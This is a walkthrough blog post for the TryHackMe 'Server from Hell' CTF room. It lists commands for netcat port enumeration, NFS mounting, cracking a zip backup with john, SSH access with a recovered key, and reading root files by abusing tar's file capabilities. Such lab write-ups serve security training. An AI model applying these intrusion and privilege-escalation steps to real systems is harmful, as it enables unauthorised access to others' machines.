Post

THM: The Server from Hell

Posted
Preview Image
By Diogo Lages
2 min read
THM: The Server from Hell

Walkthrough

CTF Platform: TryHackMe

Level: Medium

Tools Used:

  • nmap
  • netcat (nc)
  • zipinfo, zip2john, john
  • ssh
  • getcap
  • tar

Resources Used::

Steps for the CTF

Step 1: Enumeration

The first step in any CTF is enumeration. Start by connecting to port 1337 using netcat:

1

nc <IP> 1337

You will need to enumerate multiple ports to find hidden services. Use a loop to automate this process:

1

for i in {1..100}; do nc <IP> $i; echo ""; done

Once you identify an open port (e.g., 12345), connect to it:

1

nc <IP> 12345

Perform a detailed scan of the target machine using nmap:

1

nmap -sC -sV -p111,2049 <IP>

Step 2: NFS Mounting

From the nmap results, you may discover an NFS share. Create a directory and mount the NFS share:

1
2
3

mkdir nfs
sudo mount -t nfs <IP>: nfs
tree nfs

Inspect the contents of the mounted directory to find useful files.

Step 3: Cracking the Backup File

Inside the NFS share, you will find a backup.zip file. Extract information about the zip file:

1

zipinfo backup.zip

Convert the zip file into a hash format compatible with john:

1

zip2john backup.zip > backup.hash

Crack the hash using john and the rockyou.txt wordlist:

1

john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt

Once cracked, extract the contents of the zip file and locate the flag.txt.

Step 4: SSH Access

In the extracted files, you will find a hint.txt file. Read it for clues:

1

cat hint.txt

Perform another nmap scan to discover open SSH ports:

1

nmap -sV -p 2500-4500 <IP> | grep -i ssh

Locate the private key (id_rsa) and set the correct permissions:

1

chmod 600 id_rsa

Use the private key to SSH into the server as the user hades:

1

ssh -i id_rsa hades@<IP> -p 3333

Once logged in, spawn a proper shell:

1

exec '/bin/bash'

Locate and read the user.txt file:

1

cat user.txt

Step 5: Privilege Escalation

To escalate privileges, check for capabilities assigned to binaries:

1

getcap -r / 2>/dev/null

Identify a binary with unusual capabilities (e.g., tar). Use it to copy the root.txt file from the /root directory:

1
2

tar -cvf flag.tar /root/root.txt
tar xf flag.tar

Read the contents of the root.txt file:

1

cat root/root.txt
CTF, Red Team
CTF Red Team
This post is licensed under CC BY 4.0 by the author.